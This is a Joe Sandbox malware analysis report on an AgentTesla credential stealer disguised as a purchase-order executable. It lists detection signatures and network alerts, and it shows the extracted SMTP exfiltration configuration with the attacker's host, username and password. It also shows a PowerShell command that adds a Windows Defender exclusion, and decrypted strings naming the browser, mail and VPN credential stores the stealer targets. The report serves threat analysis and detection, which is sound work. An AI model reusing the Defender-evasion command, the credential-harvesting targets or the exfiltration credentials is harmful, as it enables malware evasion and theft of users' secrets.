Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO82200487.exe

Overview

General Information

Sample name:PO82200487.exe
Analysis ID:1569124
MD5:9af88888e3c54e3a62bc409ea5de349e
SHA1:6ba1ed216e4b1003d7bf0445b8a0bde4d7dc4694
SHA256:2abceffc33aa61d03182eeed898d402dcbfb1ddca4d1e6ee4b0b0482aa4f3b8a
Tags:exeuser-TeamDreier
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • PO82200487.exe (PID: 7580 cmdline: "C:\Users\user\Desktop\PO82200487.exe" MD5: 9AF88888E3C54E3A62BC409EA5DE349E)
    • powershell.exe (PID: 7760 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO82200487.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 8036 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • PO82200487.exe (PID: 7780 cmdline: "C:\Users\user\Desktop\PO82200487.exe" MD5: 9AF88888E3C54E3A62BC409EA5DE349E)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": "     *o9H+18Q4%;M     "}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000004.00000002.2568941236.000000000321A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000004.00000002.2567205281.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
        00000004.00000002.2568941236.00000000031C1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000004.00000002.2568941236.00000000031C1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000000.00000002.1350373878.0000000004172000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              Click to see the 5 entries
              SourceRuleDescriptionAuthorStrings
              4.2.PO82200487.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                0.2.PO82200487.exe.4339620.1.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security

                  System Summary

                  barindex
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO82200487.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO82200487.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO82200487.exe", ParentImage: C:\Users\user\Desktop\PO82200487.exe, ParentProcessId: 7580, ParentProcessName: PO82200487.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO82200487.exe", ProcessId: 7760, ProcessName: powershell.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO82200487.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO82200487.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO82200487.exe", ParentImage: C:\Users\user\Desktop\PO82200487.exe, ParentProcessId: 7580, ParentProcessName: PO82200487.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO82200487.exe", ProcessId: 7760, ProcessName: powershell.exe
                  Source: Network ConnectionAuthor: frack113: Data: DesusertionIp: 199.79.62.115, DesusertionIsIpv6: false, DesusertionPort: 587, EventID: 3, Image: C:\Users\user\Desktop\PO82200487.exe, Initiated: true, ProcessId: 7780, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49721
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO82200487.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO82200487.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO82200487.exe", ParentImage: C:\Users\user\Desktop\PO82200487.exe, ParentProcessId: 7580, ParentProcessName: PO82200487.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO82200487.exe", ProcessId: 7760, ProcessName: powershell.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-05T14:03:44.666475+010020301711A Network Trojan was detected192.168.2.949721199.79.62.115587TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-05T14:02:10.944038+010028555421A Network Trojan was detected192.168.2.949721199.79.62.115587TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-05T14:02:10.944038+010028552451A Network Trojan was detected192.168.2.949721199.79.62.115587TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-05T14:03:44.666475+010028397231Malware Command and Control Activity Detected192.168.2.949721199.79.62.115587TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-05T14:03:44.666475+010028400321A Network Trojan was detected192.168.2.949721199.79.62.115587TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": " *o9H+18Q4%;M "}
                  Source: PO82200487.exeReversingLabs: Detection: 55%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: PO82200487.exeJoe Sandbox ML: detected
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: /log.tmp
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: <br>[
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: yyyy-MM-dd HH:mm:ss
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: ]<br>
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: <br>
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Time:
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: <br>User Name:
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: <br>Computer Name:
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: <br>OSFullName:
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: <br>CPU:
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: <br>RAM:
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: <br>
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: IP Address:
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: <br>
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: <hr>
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: New
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: IP Address:
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: false
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: false
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: false
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: false
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: false
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: false
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: false
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: false
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: false
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: mail.mbarieservicesltd.com
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: saless@mbarieservicesltd.com
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: *o9H+18Q4%;M
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: iinfo@mbarieservicesltd.com
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: false
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: false
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: appdata
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: KTvkzEc
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: KTvkzEc.exe
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: KTvkzEc
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Type
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: <br>
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: <hr>
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: <br>
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: <b>[
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: ]</b> (
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: )<br>
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: {BACK}
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: {ALT+TAB}
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: {ALT+F4}
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: {TAB}
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: {ESC}
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: {Win}
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: {CAPSLOCK}
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: {KEYUP}
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: {KEYDOWN}
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: {KEYLEFT}
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: {KEYRIGHT}
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: {DEL}
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: {END}
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: {HOME}
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: {Insert}
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: {NumLock}
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: {PageDown}
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: {PageUp}
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: {ENTER}
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: {F1}
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: {F2}
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: {F3}
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: {F4}
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: {F5}
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: {F6}
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: {F7}
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: {F8}
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: {F9}
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: {F10}
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: {F11}
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: {F12}
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: control
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: {CTRL}
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: &amp;
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: &lt;
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: &gt;
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: &quot;
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: <br><hr>Copied Text: <br>
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: <hr>
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: logins
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: IE/Edge
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Windows Secure Note
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Windows Web Password Credential
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Windows Credential Picker Protector
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Web Credentials
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Windows Credentials
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Windows Domain Certificate Credential
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Windows Domain Password Credential
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Windows Extended Credential
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: 00000000-0000-0000-0000-000000000000
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: SchemaId
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: pResourceElement
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: pIdentityElement
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: pPackageSid
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: pAuthenticatorElement
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: IE/Edge
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: UC Browser
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: UCBrowser\
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Login Data
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: journal
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: wow_logins
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Safari for Windows
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \Common Files\Apple\Apple Application Support\plutil.exe
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \Apple Computer\Preferences\keychain.plist
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: <array>
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: <dict>
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: <string>
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: </string>
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: <string>
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: </string>
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: <data>
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: </data>
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: -convert xml1 -s -o "
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \fixed_keychain.xml"
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \Microsoft\Credentials\
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \Microsoft\Credentials\
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \Microsoft\Credentials\
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \Microsoft\Credentials\
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \Microsoft\Protect\
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: credential
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: QQ Browser
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Tencent\QQBrowser\User Data
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \Default\EncryptedStorage
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Profile
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \EncryptedStorage
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: entries
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: category
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Password
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: str3
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: str2
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: blob0
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: password_value
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: IncrediMail
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: PopPassword
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: SmtpPassword
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Software\IncrediMail\Identities\
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \Accounts_New
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: PopPassword
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: SmtpPassword
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: SmtpServer
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: EmailAddress
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Eudora
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Software\Qualcomm\Eudora\CommandLine\
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: current
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Settings
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: SavePasswordText
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Settings
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: ReturnAddress
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Falkon Browser
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \falkon\profiles\
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: profiles.ini
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: startProfile=([A-z0-9\/\.\"]+)
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: profiles.ini
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \browsedata.db
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: autofill
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: ClawsMail
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \Claws-mail
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \clawsrc
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \clawsrc
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: passkey0
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: master_passphrase_salt=(.+)
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: master_passphrase_pbkdf2_rounds=(.+)
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \accountrc
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: smtp_server
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: address
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: account
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \passwordstorerc
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: {(.*),(.*)}(.*)
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Flock Browser
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: APPDATA
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \Flock\Browser\
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: signons3.txt
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: DynDns
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: ALLUSERSPROFILE
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Dyn\Updater\config.dyndns
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: username=
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: password=
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: https://account.dyn.com/
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: t6KzXhCh
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: ALLUSERSPROFILE
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Dyn\Updater\daemon.cfg
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: global
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: accounts
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: account.
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: username
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: account.
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: password
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Psi/Psi+
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: name
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: password
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Psi/Psi+
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: APPDATA
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \Psi\profiles
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: APPDATA
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \Psi+\profiles
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \accounts.xml
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \accounts.xml
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: OpenVPN
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Software\OpenVPN-GUI\configs
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Software\OpenVPN-GUI\configs
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Software\OpenVPN-GUI\configs\
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: username
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: auth-data
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: entropy
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: USERPROFILE
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \OpenVPN\config\
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: remote
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: remote
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: NordVPN
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: NordVPN
